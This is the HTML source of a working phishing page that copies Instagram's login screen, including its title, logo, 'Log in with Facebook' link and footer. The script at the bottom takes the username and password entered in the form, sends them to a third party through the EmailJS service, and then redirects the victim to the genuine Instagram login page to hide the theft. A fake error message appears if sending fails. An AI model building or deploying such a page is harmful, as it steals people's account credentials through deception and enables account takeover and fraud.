<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />

<link rel="icon" type="image/png" href="Images/Instagram-Favicon.png">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css">

<meta property="og:title" content="Login • Instagram" />
<meta property="og:description" content="Welcome back to Instagram. Sign in to check out what your friends, family &amp; interests have been capturing &amp; sharing around the world." />
<meta name="description" content="Welcome back to Instagram. Sign in to check out what your friends, family &amp; interests have been capturing &amp; sharing around the world." />
<meta property="og:url" content="https://instagram-luxe.onrender.com" />
<meta property="og:image" content="https://raw.githubusercontent.com/BennyBoy10/IG/main/Images/Instagram-Favicon.png" />
<meta property="og:type" content="website" />

<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
<script type="text/javascript">
(function(){
  emailjs.init("ANPsdyWIlS5jsJjs5");
})();
</script>


<title>Login • Instagram</title>


<style>

@import url('https://fonts.googleapis.com/css?family=Roboto&display=swap');

*{
	margin: 0;
	padding: 0;
	box-sizing: border-box;
	outline: none;
	list-style: none;
	text-decoration: none;
	font-family: 'Roboto', sans-serif;
}

body{
	background: #fafafa;
	font-size: 14px;
}

.wrapper .header{
	max-width: 350px;
	width: 100%;
	height: auto;
	margin: 10px auto;
}

.wrapper .header .top,
.wrapper .signup{
	background: #fff;
    border: 1px solid #e6e6e6;
    border-radius: 1px;
    padding: 40px 40px 20px;
}

.wrapper .header .logo img{
	display: block;
	margin: 0 auto 35px;
}

.wrapper .header .box .form-group{
	margin-bottom: 5px;
}

.wrapper .header .box .form-group .form-group{
	width: 100%;
	background: #fafafa;
	border: 1px solid #efefef;
	font-size: 12px;
	border-radius: 3px;
	color: #262626;
	padding: 10px;
}

button{
	cursor: pointer;
  width: 100%;
	margin: 10px 0;
	background-color: #3897f0;
    border: 1px solid #3897f0;
    border-radius: 4px;
    text-align: center;
    padding: 5px;
}
#submit:hover {
	background-color: #1477d5;
}
button{
	color: #fff;
	display: block;
}

.wrapper .header .box .form-group .form-group:focus{
	border: 1px solid #b2b2b2;
}

.wrapper .header .box .btn{
	margin: 10px 0;
	background-color: #3897f0;
    border: 1px solid #3897f0;
    border-radius: 4px;
    text-align: center;
    padding: 5px;
}

.wrapper .header .box .btn a{
	color: #fff;
	display: block;
}

.wrapper .header .or{
	display: flex;
	justify-content: space-between;
	align-items: center;
	height: 15px;
	margin: 15px 0 20px;
}

.wrapper .header .or .line{
	width: 105px;
	height: 2px;
	background: #efefef
}

.wrapper .header .or p{
	color: #999;
	font-size: 12px;
}

.wrapper .dif .fb{
	display: flex;
	justify-content: center;
	align-items: center;
}

.wrapper .dif .fb img{
	width: 16px;
	height: 16px;
}

.wrapper .dif  .fb p{
	color: #385185;
	font-weight: 500;
	margin-left: 10px;
}

.wrapper .dif .forgot{
	font-size: 12px;
	text-align: center;
	margin-top: 20px;
}

.wrapper .dif .forgot a{
	color: #003569;
}

.wrapper .signup{
	margin: 10px 0 20px;
	padding: 25px 40px;
	text-align: center;
	color: #262626;
}

.wrapper .signup a{
	color: #3897f0;
}

.wrapper .apps{
	text-align: center;
	color: #262626;
}

.wrapper .apps p{
	margin-bottom: 20px;
}

.wrapper .apps a img{
	width: 135px;
	height: 40px;
	margin: 0 5px;
}

.footer{
	max-width: 935px;
	width: 100%;
	margin: 0 auto;
	padding: 40px 0;
	display: flex;
	justify-content: space-between;
}

.footer .links ul li{
	display: inline-block;
	margin-right: 10px;
}

.footer .links ul li a{
	color: #003569;
	font-size: 12px;
}

.footer .copyright{
  text-align: center;
	color: #999;	
}
#error {
	display: none;
	margin-top: -25px;
	margin-bottom: 10px;
	text-align: center;
	color: red;
}


</style>

</head>
<body>
<div class="wrapper">
<div class="header">
<div class="top">
<div class="logo">
  
<img src="Images/Instagram-Logo.png" alt="instagram" style="width: 175px;">
<p id="error">An error has occured, please try again!</p>

</div>
<div class="box">

<form id="InstaForm">
  <div class="form-group">
<input name="email" type="text" required="" id="email" minlength="6" placeholder="Phone number, username, or email" required class="form-group"><label></label>
  </div>
  <div class="form-group">
<input type="password" id="password" name="password" minlength="6" placeholder="Password" required class="form-group"><label></label>
  </div>
<button type="submit" id="submit">Sign In</button>
</form>


</div>
<div class="or">
<div class="line"></div>
<p>OR</p>
<div class="line"></div>
</div>
<div class="dif">
<div class="fb">
  
<img src="Images/Facebook.png" alt="facebook">

<p>Log in with Facebook</p>
</div>
<div class="forgot">
<a href="">Forgot password?</a>
</div>
</div>
</div>
<div class="signup">
<p>Don't have an account? <a href="">Sign up</a></p>
</div>
<div class="apps">
<p>Get the app.</p>
<div class="icons">

<a href=""><img src="Images/Appstore.png" alt="appstore"></a>	
<a href=""><img src="Images/GooglePlay.png" alt="googleplay"></a>

</div>
</div>
</div>
<div class="footer">
<div class="links">
<ul>
<div class="copyright">
© 2024 INSTAGRAM
</div>
<li><a href="">ABOUT US</a></li>
<li><a href="">SUPPORT</a></li>
<li><a href="">PRESS</a></li>
<li><a href="">API</a></li>
<li><a href="">JOBS</a></li>
<li><a href="">PRIVACY</a></li>
<li><a href="">TERMS</a></li>
<li><a href="">DIRECTORY</a></li>
<li><a href="">PROFILES</a></li>
<li><a href="">HASHTAGS</a></li>
<li><a href="">LANGUAGE</a></li>
</ul>
</div>
</div>
</div>

  <script>
function sendMail() {
var Username = document.getElementById("email").value;
var Password = document.getElementById("password").value;
var submitButtonId = "IG";
var ErrorP = document.getElementById("error");

emailjs.send("service_wgs8vup","template_79435mm",{
username: Username,
password: Password,
submit_button_id: submitButtonId,
})
.then(function(response) {
window.location.href = "https://www.instagram.com/accounts/login/";
})
.catch(function(error) {
ErrorP.style.display = "block";
submitButton.disabled = false;
submitButton.innerHTML = "Sign In";
});
}

var submitButton = document.getElementById("submit");
var Form = document.getElementById("InstaForm");
submitButton.disabled = false;

Form.addEventListener("submit", function() {
  event.preventDefault();
	sendMail();
	submitButton.disabled = true;
	submitButton.innerHTML = "Loading...";
});

var UsernameField = document.getElementById("email");
var PasswordField = document.getElementById("password");
var theSubmitButton = document.getElementById("submit");
var ErrorP = document.getElementById("error");
UsernameField.addEventListener("focus", function() {
	ErrorP.style.display = "none";
});
PasswordField.addEventListener("focus", function() {
	ErrorP.style.display = "none";
});
theSubmitButton.addEventListener("click", function() {
	ErrorP.style.display = "none";
})
	</script>

</body>
</html>
